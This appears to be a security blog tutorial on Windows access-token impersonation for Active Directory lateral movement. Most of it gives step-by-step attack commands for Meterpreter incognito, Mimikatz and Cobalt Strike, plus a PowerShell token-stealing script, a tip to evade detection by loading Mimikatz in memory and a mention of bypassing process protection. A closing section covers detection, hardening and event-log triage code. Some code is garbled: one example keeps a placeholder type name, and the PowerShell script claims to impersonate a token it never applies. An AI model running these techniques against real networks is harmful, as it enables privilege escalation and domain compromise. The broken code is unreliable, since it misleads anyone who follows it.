Introduction:
In modern Active Directory (AD) environments, compromising a single endpoint with local admin rights is often just the beginning. Token impersonation is a stealthy post-exploitation technique that allows attackers to assume the identity of any logged-on user—including Domain Admins—by stealing access tokens already present in system memory, without ever touching LSASS or dumping password hashes. This article dives deep into token-based lateral movement across Meterpreter, Mimikatz, and Cobalt Strike, then arms defenders with detection and hardening strategies to block these attacks.
Learning Objectives:
- Understand the difference between primary and impersonation tokens and how Windows assigns them to processes and threads.
- Execute token impersonation attacks using three industry-standard frameworks (Metasploit, Mimikatz, Cobalt Strike) with verified commands.
- Implement effective mitigations including privilege restriction, process monitoring, and event log analysis to detect token theft.
You Should Know:
- Windows Access Tokens: The Keys Floating in Memory
Every Windows process runs with an access token that defines its security context (user, groups, privileges). Primary tokens are bound to processes; impersonation tokens are attached to threads, allowing a thread to act as another user. When a privileged account (e.g., a Domain Admin) leaves an interactive logon session or a service running, its token remains cached—ripe for theft. Attackers with SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege (often held by LOCAL SERVICE, NETWORK SERVICE, or administrators) can capture these tokens.
Step-by-step guide to enumerate your current privileges (Windows command):
```cmd
whoami /priv
```
Look for SeImpersonatePrivilege and SeDebugPrivilege. If present, you can impersonate any token on the system. To list all active logon sessions and their associated tokens (requires admin):
```cmd
query user
```
For deeper inspection, use Sysinternals Process Explorer: right-click a process → Properties → Security tab to view its token groups.
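To turn the `whoami /priv` check above into something a defender can run over the output collected from a fleet's service and admin accounts, here is an added Python example (not from the original article) that parses constructed `whoami /priv` output and reports which of the token-theft privileges named above an account holds; a `Disabled` state is still counted, because the holder can re-enable it.

```python
import re

# Constructed sample of `whoami /priv` output for a service-style account
# (not captured from a real host).
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeDebugPrivilege              Debug programs                            Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# The privileges the article singles out as enabling token theft.
TOKEN_THEFT_PRIVS = {
    "SeImpersonatePrivilege",
    "SeAssignPrimaryTokenPrivilege",
    "SeDebugPrivilege",
}

# One table row: name, free-text description, then Enabled/Disabled.
_ROW = re.compile(r"^(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def token_theft_exposure(privs):
    """Return the held token-theft privileges, sorted. 'Disabled' only means the
    privilege is not currently enabled in the token; the account can re-enable
    it with AdjustTokenPrivileges, so it still counts as held."""
    return sorted(p for p in privs if p in TOKEN_THEFT_PRIVS)


if __name__ == "__main__":
    held = parse_whoami_priv(SAMPLE_WHOAMI_PRIV)
    for p in token_theft_exposure(held):
        print(f"{p}: {held[p]}")
```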
- Technique 1: Meterpreter & Incognito – The Classic Token Hunter
Metasploit’s incognito extension remains a reliable token manipulation tool. After gaining a Meterpreter session with admin privileges, follow these steps:
Step-by-step guide:
```text
# Load incognito
load incognito
# List available tokens (only delegation tokens, -u for users)
list_tokens -u
# Impersonate a discovered high-value token (e.g., Domain Admin)
impersonate_token "CORP\jdoe_da"
# Verify identity
getuid
# Spawn a new process with stolen token (optional)
shell
# Revert to original token
drop_token
```
If you see “NT AUTHORITY\SYSTEM” in the list, you can impersonate it to gain full control. To hunt for tokens across the entire domain, combine with `kiwi` extension to dump credentials from memory after token elevation. A common pitfall: tokens are volatile—if the target user logs off, the token disappears. Use `ps` to list processes and look for those running under privileged accounts, then migrate to that process (migrate <PID>) to inherit its token directly.
- Technique 2: Mimikatz – Token Manipulation Beyond Credential Dumping
While Mimikatz is famous for sekurlsa::logonpasswords, its token module offers unparalleled control. You must first run Mimikatz with administrative rights and enable debug privilege.
Step-by-step guide:
```text
# Elevate to debug
privilege::debug
# List all tokens currently in memory
token::list
# Elevate to SYSTEM by stealing a SYSTEM token
token::elevate
# Automatic Domain Admin token hunt and impersonation
token::elevate /domainadmin
# After impersonation, launch a new process
misc::cmd
```
For manual targeting, note the token ID from token::list, then use `token::run` with the ID. If `token::elevate /domainadmin` fails, the environment may lack an active DA token—consider forcing a logon via SMB or scheduled task. To clean up, use token::revert. Defenders often scan for Mimikatz command-line arguments; obfuscate by using PowerShell to load Mimikatz in memory (e.g., Invoke-Mimikatz). Example PowerShell-based token elevation (using Reflection):
```powershell
$m = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("C:\path\to\mimikatz.exe"))
[<entry-type-name-lost-in-source>]::main("privilege::debug token::elevate /domainadmin exit")
```
- Technique 3: Cobalt Strike Beacon – Native Token Primitives
Cobalt Strike’s Beacon integrates token manipulation without external tools. The `steal_token` command takes a process ID (PID) of a running process under the target user. First, enumerate processes with ps.
Step-by-step guide:
```text
# List processes and find PID of explorer.exe running as Domain Admin
ps
# Steal token from that PID
steal_token 1234
# Verify current user
getuid
# Execute commands under stolen context
shell whoami
# Revert to original token
rev2self
```
If you have credentials (hash or password), `make_token` creates a new token without needing an existing process:
```text
make_token CORP\administrator Password123!
```
Use `jump` commands (e.g., psexec) after `steal_token` to move laterally using the stolen identity. For persistence, consider `mimikatz token::elevate` inside Beacon’s execute-assembly. Note that `steal_token` fails if the target process is protected (e.g., PPL). In such cases, use `mimikatz` with `!+` to bypass protection.
- Advanced Manual Token Impersonation with PowerShell and WinAPI
For custom tooling or when frameworks are blocked, you can invoke token manipulation via Windows API calls using PowerShell. The following script replicates `steal_token` functionality:
Step-by-step guide (run as admin):
```powershell
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class TokenMan {
    [DllImport("advapi32.dll", SetLastError=true)]
    public static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
    [DllImport("kernel32.dll", SetLastError=true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);
    [DllImport("advapi32.dll", SetLastError=true)]
    public static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken);
    [DllImport("advapi32.dll", SetLastError=true)]
    public static extern bool ImpersonateLoggedOnUser(IntPtr hToken);
}
"@
# PID of target process (e.g., 1234). $pid is a read-only automatic variable in PowerShell, so use another name.
$targetPid = 1234
$hProcess = [TokenMan]::OpenProcess(0x1F0FFF, $false, $targetPid)
# Out parameters of type IntPtr need an IntPtr-typed variable passed by [ref]
$hToken = [IntPtr]::Zero
[TokenMan]::OpenProcessToken($hProcess, 0x2, [ref]$hToken)
$hDupToken = [IntPtr]::Zero
[TokenMan]::DuplicateTokenEx($hToken, 0x2, [IntPtr]::Zero, 2, 1, [ref]$hDupToken)
# Now run commands under stolen identity
Start-Process -FilePath "cmd.exe" -LoadUserProfile -Credential ([System.Management.Automation.PSCredential]::Empty)
```
This manually duplicates an impersonation token and applies it to the current thread. Use `whoami` in the new process to confirm. To revert, restart PowerShell.
- Detection & Mitigation: Shutting Down Token Theft
Defenders must assume token impersonation attempts will occur. The primary mitigation is enforcing the Tiered Administrative Model: Domain Admins should only log onto Domain Controllers or dedicated Privileged Access Workstations (PAWs), never onto standard user workstations. Additionally, restrict SeImpersonatePrivilege and SeDebugPrivilege via Group Policy—only grant them to trusted service accounts.
Step-by-step detection guide (Windows Event Logs & Sysmon):
- Enable Sysmon (Event ID 10 – ProcessAccess) to monitor `OpenProcess` calls with `PROCESS_ALL_ACCESS` (0x1F0FFF) from suspicious binaries like mimikatz.exe or powershell.exe.
- Look for Event ID 4672 (Special Logon) assigned to anonymous logon sessions after token impersonation.
- Monitor Event ID 4648 (Logon with explicit credentials) when `make_token` or similar is used.
- Deploy Windows Defender Credential Guard to isolate LSASS and prevent token extraction.
- Use PowerShell logging (ScriptBlock Logging) to catch inline token manipulation scripts.
To hunt for active token impersonation, run the following on a suspected compromised host:
```powershell
# -like needs wildcards, otherwise only a message consisting solely of the privilege name would match
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4672} | Where-Object { $_.Message -like "*SeImpersonatePrivilege*" }
```
For Linux-based attackers pivoting into Windows via PSExec, monitor network logons (Event ID 4624) with Logon Type 3 (Network) and unusual token elevations.
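As an added example, not part of the original article, here is a Python triage function that applies the hunting rules above to a handful of constructed Sysmon and Security events normalised into dictionaries the way a SIEM flattens event XML; the `expected_admins` allowlist is an assumption added here, because Event ID 4672 fires on every privileged logon and would otherwise drown the other signals.

```python
import os

# Constructed sample events (not captured from a real host), flattened as a SIEM
# would present Sysmon and Security-log fields.
SAMPLE_EVENTS = [
    {"source": "Sysmon", "id": 10, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1F0FFF"},
    {"source": "Sysmon", "id": 10, "SourceImage": r"C:\Program Files\EDR\sensor.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1000"},
    {"source": "Security", "id": 4672, "SubjectUserName": "svc-backup",
     "PrivilegeList": "SeImpersonatePrivilege\n\t\t\tSeDebugPrivilege"},
    {"source": "Security", "id": 4672, "SubjectUserName": "jdoe_da",
     "PrivilegeList": "SeSecurityPrivilege\n\t\t\tSeDebugPrivilege"},
    {"source": "Security", "id": 4648, "SubjectUserName": "jdoe", "TargetUserName": "administrator",
     "ProcessName": r"C:\Windows\System32\rundll32.exe"},
    {"source": "Security", "id": 4624, "TargetUserName": "jdoe_da", "LogonType": "3"},
]

SUSPICIOUS_SOURCES = {"mimikatz.exe", "powershell.exe"}   # source images the article calls out
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeDebugPrivilege"}
PROCESS_ALL_ACCESS = 0x1F0FFF                              # the access mask the article has Sysmon watch


def triage(events, expected_admins=frozenset()):
    """Apply the article's token-theft hunting rules and return (rule, detail) findings.
    expected_admins (assumption): accounts for which 4672 carrying these privileges is
    routine, e.g. known Domain Admins on a PAW; they are skipped to reduce noise."""
    findings = []
    for e in events:
        eid = e["id"]
        if e["source"] == "Sysmon" and eid == 10:
            # Sysmon ProcessAccess: full-access handle from a scripting/dumping host process
            src = os.path.basename(e["SourceImage"].replace("\\", "/")).lower()
            if int(e["GrantedAccess"], 16) == PROCESS_ALL_ACCESS and src in SUSPICIOUS_SOURCES:
                findings.append(("sysmon10_full_access", f"{src} -> {e['TargetImage']}"))
        elif eid == 4672:
            # Special Logon: token-theft privileges assigned to an account we do not expect
            privs = set(e["PrivilegeList"].split())
            user = e["SubjectUserName"]
            if privs & TOKEN_PRIVS and user.lower() not in expected_admins:
                findings.append(("4672_token_privs", f"{user}: {sorted(privs & TOKEN_PRIVS)}"))
        elif eid == 4648:
            # Logon with explicit credentials, the trace make_token-style activity leaves
            findings.append(("4648_explicit_creds", f"{e['SubjectUserName']} as {e['TargetUserName']} via {e['ProcessName']}"))
        elif eid == 4624 and e["LogonType"] == "3":
            # Network logon, to correlate with any 4672 for the same account on this host
            findings.append(("4624_network_logon", e["TargetUserName"]))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS, expected_admins={"jdoe_da"}):
        print(f"{rule}: {detail}")
```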
What Undercode Say:
- Token impersonation is a silent killer in AD environments—bypassing both EDR’s credential dumping alerts and password policies. Defenders must prioritize privilege reduction over detection alone.
- The most effective defense is not a tool but a policy: Domain Admins must never leave tokens behind on low-trust hosts. Even with perfect detection, if a DA logs into a workstation, the token is already compromised.
Prediction:
As Microsoft pushes Credential Guard and TPM-based isolation, classic token theft from LSASS will become harder. Attackers will shift to abusing legitimate cloud-based tokens (e.g., Azure AD Primary Refresh Tokens) and B2B collaboration tokens, moving impersonation from on-prem memory to OAuth caches. Red teams will soon combine token impersonation with Graph API token reuse, blurring the line between AD and Entra ID attacks. Defenders must extend the Tiered Model to cloud service principals—or risk the ghost moving from the domain to the tenant.
Reported By: Zlatanh Mastering – Hackers Feeds